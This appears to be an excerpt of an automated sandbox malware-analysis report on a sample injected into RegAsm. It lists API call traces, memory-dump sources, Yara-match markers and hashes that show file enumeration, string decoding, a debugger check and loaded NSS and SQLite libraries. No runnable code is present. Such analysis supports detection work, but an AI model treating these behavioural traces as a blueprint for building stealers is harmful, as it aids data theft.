                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: K11_$Slotlstrcat$AuthenticateBinaryCryptDecryptFreeInternalStringlstrlenmemcpymemset
                                                                                • String ID:
                                                                                • API String ID: 2251291257-0
                                                                                • Opcode ID: 0d194773312f30509f7fa6cf098b79dbf7b5062e3d3c24c3d5d924c9773e7279
                                                                                • Instruction ID: ccf38daf680dc84ecda820ff8efca09b4dd81ade2d3244571ab64e279443b136
                                                                                • Opcode Fuzzy Hash: 0d194773312f30509f7fa6cf098b79dbf7b5062e3d3c24c3d5d924c9773e7279
                                                                                • Instruction Fuzzy Hash: B6217AB190011DEFCB109FA4ED45AEE7BBCFB08744F10047AFA05F2250EB359A459BA5
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 00409905
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                  • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                  • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                  • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                  • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00425BFE,00000000,74E1AC90), ref: 00409964
                                                                                • StrCmpCA.SHLWAPI(?,00425E34), ref: 00409981
                                                                                • StrCmpCA.SHLWAPI(?,00425E38), ref: 0040999B
                                                                                  • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                  • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                  • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                  • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                  • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426498,00000001,000000C8,00000000,004265BA), ref: 00410BA1
                                                                                  • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                                  • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                                  • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                                  • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                                  • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                                  • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                                  • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                  • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                  • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                  • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                • FindNextFileA.KERNEL32(00000000,?), ref: 00409F07
                                                                                • FindClose.KERNEL32(00000000), ref: 00409F16
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog$Filelstrcpy$Find$CloseCreatelstrcat$AllocFirstHandleLocalNextObjectReadSingleSizeSystemThreadTimeWaitlstrlen
                                                                                • String ID: "$\*.*
                                                                                • API String ID: 1275501236-2874818444
                                                                                APIs
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C9A8FEE
                                                                                • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C9A90DC
                                                                                • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C9A9118
                                                                                • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C9A915C
                                                                                • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C9A91C2
                                                                                • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C9A9209
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: _byteswap_ulong$Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                • String ID: 3333$UUUU
                                                                                • API String ID: 1967222509-2679824526
                                                                                APIs
                                                                                  • Part of subcall function 6C85CA30: EnterCriticalSection.KERNEL32(?,?,?,6C8BF9C9,?,6C8BF4DA,6C8BF9C9,?,?,6C88369A), ref: 6C85CA7A
                                                                                  • Part of subcall function 6C85CA30: LeaveCriticalSection.KERNEL32(?), ref: 6C85CB26
                                                                                • memset.VCRUNTIME140(00000000,00000000,00000C0A), ref: 6C86103E
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 6C861139
                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 6C861190
                                                                                • sqlite3_free.NSS3(00000000), ref: 6C861227
                                                                                • sqlite3_log.NSS3(0000001B,delayed %dms for lock/sharing conflict at line %d,00000001,0000BCFE), ref: 6C86126E
                                                                                • sqlite3_free.NSS3(?), ref: 6C86127F
                                                                                Strings
                                                                                • winAccess, xrefs: 6C86129B
                                                                                • delayed %dms for lock/sharing conflict at line %d, xrefs: 6C861267
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeavesqlite3_free$memsetsqlite3_log
                                                                                • String ID: delayed %dms for lock/sharing conflict at line %d$winAccess
                                                                                • API String ID: 2733752649-1873940834
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(?,?,00000002,?,6C98CF46,?,6C85CDBD,?,6C98BF31,?,?,?,?,?,?,?), ref: 6C86B039
                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C98CF46,?,6C85CDBD,?,6C98BF31), ref: 6C86B090
                                                                                • sqlite3_free.NSS3(?,?,?,?,?,?,6C98CF46,?,6C85CDBD,?,6C98BF31), ref: 6C86B0A2
                                                                                • CloseHandle.KERNEL32(?,?,6C98CF46,?,6C85CDBD,?,6C98BF31,?,?,?,?,?,?,?,?,?), ref: 6C86B100
                                                                                • sqlite3_free.NSS3(?,?,00000002,?,6C98CF46,?,6C85CDBD,?,6C98BF31,?,?,?,?,?,?,?), ref: 6C86B115
                                                                                • sqlite3_free.NSS3(?,?,?,?,?,?,6C98CF46,?,6C85CDBD,?,6C98BF31), ref: 6C86B12D
                                                                                  • Part of subcall function 6C859EE0: EnterCriticalSection.KERNEL32(?,?,?,?,6C86C6FD,?,?,?,?,6C8BF965,00000000), ref: 6C859F0E
                                                                                  • Part of subcall function 6C859EE0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C8BF965,00000000), ref: 6C859F5D
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$sqlite3_free$EnterLeave$CloseHandle
                                                                                • String ID:
                                                                                • API String ID: 3155957115-0
                                                                                APIs
                                                                                • PR_CallOnce.NSS3(6CA314E4,6C99CC70), ref: 6C9E8D47
                                                                                • PR_GetCurrentThread.NSS3 ref: 6C9E8D98
                                                                                  • Part of subcall function 6C8C0F00: PR_GetPageSize.NSS3(6C8C0936,FFFFE8AE,?,6C8516B7,00000000,?,6C8C0936,00000000,?,6C85204A), ref: 6C8C0F1B
                                                                                  • Part of subcall function 6C8C0F00: PR_NewLogModule.NSS3(clock,6C8C0936,FFFFE8AE,?,6C8516B7,00000000,?,6C8C0936,00000000,?,6C85204A), ref: 6C8C0F25
                                                                                • PR_snprintf.NSS3(?,?,%u.%u.%u.%u,?,?,?,?), ref: 6C9E8E7B
                                                                                • htons.WSOCK32(?), ref: 6C9E8EDB
                                                                                • PR_GetCurrentThread.NSS3 ref: 6C9E8F99
                                                                                • PR_GetCurrentThread.NSS3 ref: 6C9E910A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread$CallModuleOncePageR_snprintfSizehtons
                                                                                • String ID: %u.%u.%u.%u
                                                                                • API String ID: 1845059423-1542503432
                                                                                APIs
                                                                                • ?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C802C31
                                                                                • ?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C802C61
                                                                                  • Part of subcall function 6C7B4DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C7B4E5A
                                                                                  • Part of subcall function 6C7B4DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C7B4E97
                                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C802C82
                                                                                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C802E2D
                                                                                  • Part of subcall function 6C7C81B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C7C81DE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650238110.000000006C7B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c7b0000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: String$Double$Converter@double_conversion@@$Dtoa$Ascii@Builder@2@Builder@2@@Converter@CreateDecimalEcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestV12@__acrt_iob_func__stdio_common_vfprintfstrlen
                                                                                • String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
                                                                                • API String ID: 801438305-4149320968
                                                                                APIs
                                                                                • IsDebuggerPresent.KERNEL32 ref: 0041D65A
                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041D66F
                                                                                • UnhandledExceptionFilter.KERNEL32(8d), ref: 0041D67A
                                                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 0041D696
                                                                                • TerminateProcess.KERNEL32(00000000), ref: 0041D69D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                • String ID: 8d
                                                                                • API String ID: 2579439406-1695097073
                                                                                APIs
                                                                                • memset.VCRUNTIME140(?,000000FF,?), ref: 6C8288F0
                                                                                • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C82925C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650238110.000000006C7B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c7b0000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memset
                                                                                • String ID: ~q{l
                                                                                • API String ID: 2221118986-2002290586
                                                                                APIs
                                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C9ED086
                                                                                • PR_Malloc.NSS3(00000001), ref: 6C9ED0B9
                                                                                • PR_Free.NSS3(?), ref: 6C9ED138
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: FreeMallocstrlen
                                                                                • String ID: >
                                                                                • API String ID: 1782319670-325317158
                                                                                APIs
                                                                                • memset.MSVCRT ref: 00402481
                                                                                • CryptStringToBinaryA.CRYPT32(00000104,00000000,00000001,00000000,?,00000000,00000000), ref: 004024A7
                                                                                • CryptStringToBinaryA.CRYPT32(00000104,00000000,00000001,?,?,00000000,00000000), ref: 004024C1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: BinaryCryptString$memset
                                                                                • String ID: UNK
                                                                                • API String ID: 1505698593-448974810
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                APIs
                                                                                • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 00410DD0
                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,00404415,?,?,?,?,?,?), ref: 00410DDD
                                                                                • HeapAlloc.KERNEL32(00000000,?,00404415,?,?,?,?,?,?), ref: 00410DE4
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$AllocBinaryCryptProcessString
                                                                                • String ID:
                                                                                • API String ID: 1871034439-0
                                                                                APIs
                                                                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004058F9,00000000,00000000), ref: 00406262
                                                                                • LocalAlloc.KERNEL32(00000040,004058F9,?,?,004058F9,00000000,?,?), ref: 00406270
                                                                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004058F9,00000000,00000000), ref: 00406286
                                                                                • LocalFree.KERNEL32(00000000,?,?,004058F9,00000000,?,?), ref: 00406295
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: BinaryCryptLocalString$AllocFree
                                                                                • String ID:
                                                                                • API String ID: 4291131564-0
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 0040E304
                                                                                  • Part of subcall function 0040E204: _EH_prolog.MSVCRT ref: 0040E209
                                                                                  • Part of subcall function 0040E204: lstrlenA.KERNEL32(?,6CD07FA0,750A5460,00000000), ref: 0040E22D
                                                                                  • Part of subcall function 0040E204: strchr.MSVCRT ref: 0040E23F
                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,6CD07FA0,00000000), ref: 0040E353
                                                                                • HeapAlloc.KERNEL32(00000000,?,6CD07FA0,00000000), ref: 0040E35A
                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,6CD07FA0,00000000), ref: 0040E36F
                                                                                • HeapFree.KERNEL32(00000000,?,6CD07FA0,00000000), ref: 0040E376
                                                                                • strcpy_s.MSVCRT ref: 0040E3AF
                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,750A5460,?,6CD07FA0,00000000), ref: 0040E3C6
                                                                                • HeapFree.KERNEL32(00000000,?,?,750A5460,?,6CD07FA0,00000000), ref: 0040E3CD
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,750A5460,?,6CD07FA0,00000000), ref: 0040E3F3
                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,750A5460,?,6CD07FA0,00000000), ref: 0040E3FA
                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,750A5460,?,6CD07FA0,00000000), ref: 0040E401
                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,750A5460,?,6CD07FA0,00000000), ref: 0040E408
                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,750A5460,?,6CD07FA0,00000000), ref: 0040E41D
                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,750A5460,?,6CD07FA0,00000000), ref: 0040E424
                                                                                • strcpy_s.MSVCRT ref: 0040E437
                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,750A5460,?,6CD07FA0,00000000), ref: 0040E448
                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,750A5460,?,6CD07FA0,00000000), ref: 0040E44F
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,750A5460,?,6CD07FA0), ref: 0040E46A
                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,750A5460,?,6CD07FA0,00000000), ref: 0040E471
                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,750A5460,?,6CD07FA0), ref: 0040E478
                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,750A5460,?,6CD07FA0,00000000), ref: 0040E47F
                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,750A5460,?,6CD07FA0), ref: 0040E494
                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,750A5460,?,6CD07FA0,00000000), ref: 0040E49B
                                                                                • strcpy_s.MSVCRT ref: 0040E4AE
                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 0040E4BF
                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,750A5460), ref: 0040E4C6
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,750A5460,?,6CD07FA0,00000000), ref: 0040E4E8
                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,750A5460,?,6CD07FA0,00000000), ref: 0040E4EF
                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,750A5460,?,6CD07FA0,00000000), ref: 0040E4F6
                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,750A5460,?,6CD07FA0,00000000), ref: 0040E4FD
                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,750A5460,?,6CD07FA0,00000000), ref: 0040E515
                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,750A5460,?,6CD07FA0,00000000), ref: 0040E51C
                                                                                • strcpy_s.MSVCRT ref: 0040E52F
                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,750A5460,?,6CD07FA0,00000000), ref: 0040E540
                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,750A5460,?,6CD07FA0,00000000), ref: 0040E547
                                                                                  • Part of subcall function 0040E156: strlen.MSVCRT ref: 0040E16D
                                                                                • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,750A5460,?,6CD07FA0,00000000), ref: 0040E550
                                                                                • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,?,?,?,?,750A5460,?,6CD07FA0,00000000), ref: 0040E560
                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,750A5460,?,6CD07FA0,00000000), ref: 0040E567
                                                                                • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,750A5460,?,6CD07FA0,00000000), ref: 0040E593
                                                                                • strcpy_s.MSVCRT ref: 0040E5B7
                                                                                • GetProcessHeap.KERNEL32(00000000,?,00000001,00000000,00000001,00000000,?,?,00000000), ref: 0040E5E0
                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,750A5460,?,6CD07FA0,00000000), ref: 0040E5E7
                                                                                • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,750A5460,?,6CD07FA0,00000000), ref: 0040E5EC
                                                                                • GetProcessHeap.KERNEL32(00000008,00000001,?,?,?,?,?,?,?,?,750A5460,?,6CD07FA0,00000000), ref: 0040E5F7
                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,750A5460,?,6CD07FA0,00000000), ref: 0040E5FE
                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,750A5460,?,6CD07FA0,00000000), ref: 0040E60F
                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,750A5460,?,6CD07FA0,00000000), ref: 0040E616
                                                                                • strcpy_s.MSVCRT ref: 0040E624
                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 0040E630
                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,750A5460), ref: 0040E637
                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 0040E65D
                                                                                • HeapFree.KERNEL32(00000000), ref: 0040E664
                                                                                • GetProcessHeap.KERNEL32(00000008,00000010), ref: 0040E66B
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 0040E672
                                                                                • strcpy_s.MSVCRT ref: 0040E68A
                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 0040E69B
                                                                                • HeapFree.KERNEL32(00000000), ref: 0040E6A2
                                                                                • strlen.MSVCRT ref: 0040E6F0
                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 0040E734
                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,750A5460), ref: 0040E73B
                                                                                  • Part of subcall function 0040E204: strchr.MSVCRT ref: 0040E263
                                                                                  • Part of subcall function 0040E204: lstrlenA.KERNEL32(?), ref: 0040E281
                                                                                  • Part of subcall function 0040E204: GetProcessHeap.KERNEL32(00000008,-00000001), ref: 0040E28E
                                                                                  • Part of subcall function 0040E204: HeapAlloc.KERNEL32(00000000), ref: 0040E295
                                                                                  • Part of subcall function 0040E204: strcpy_s.MSVCRT ref: 0040E2D0
                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 0040E787
                                                                                • HeapFree.KERNEL32(00000000), ref: 0040E78E
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$Process$Free$Allocstrcpy_s$lstrlen$H_prologstrchrstrlen
                                                                                • String ID:
                                                                                • API String ID: 2599614518-0
                                                                                APIs
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default,?,6C7C582D), ref: 6C7FCC27
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java,?,?,?,6C7C582D), ref: 6C7FCC3D
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6C82FE98,?,?,?,?,?,6C7C582D), ref: 6C7FCC56
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf,?,?,?,?,?,?,?,6C7C582D), ref: 6C7FCC6C
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio,?,?,?,?,?,?,?,?,?,6C7C582D), ref: 6C7FCC82
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio,?,?,?,?,?,?,?,?,?,?,?,6C7C582D), ref: 6C7FCC98
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall,?,?,?,?,?,?,?,?,?,?,?,?,?,6C7C582D), ref: 6C7FCCAE
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6C7FCCC4
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6C7FCCDA
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6C7FCCEC
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6C7FCCFE
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6C7FCD14
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6C7FCD82
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6C7FCD98
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6C7FCDAE
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6C7FCDC4
